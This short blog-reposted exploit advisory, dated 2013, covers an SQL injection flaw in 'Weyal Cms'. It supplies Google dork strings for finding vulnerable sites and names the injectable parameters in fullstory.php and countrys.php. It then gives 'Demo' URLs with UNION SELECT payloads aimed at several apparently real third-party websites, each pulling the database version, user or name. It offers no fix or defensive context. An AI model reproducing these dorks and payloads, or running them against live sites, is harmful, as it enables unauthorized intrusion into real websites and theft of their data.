[-] Name: Weyal Cms SQL Injection Vulnerability
[-] Vendor: N/A
[-] Date: 2013-05-22
[-] Author: XroGuE
[-] Home: http://Att4ck3r.ir
================================================
[+] Dork: intext:"Designed by Rohi.af"
intext:"Designed by Dr. Weyal"
================================================
[+] Vulnerable Page: fullstory.php?id= , countrys.php?countryid= , "check Another pages :)"
[+] Vuln: www.[site].com/[path]/fullstory.php?id=SQLi
www.[site].com/[path]/countrys.php?id=SQLi
[+] Demo: http://mysurgery.ru/fullstory.php?id=-999 union all select 1,2,version(),user(),database(),6
[+] Demo: http://www.s-rohi.com/fullstory.php?id=-999 UNION SELECT 1,2,version(),database(),5,6,7,8,9,10,11,12,13,14
[+] Demo: http://www.vegos.ru/countrys.php?countryid=-999 union all select 1,version(),database()
================================================
No comments:
Post a Comment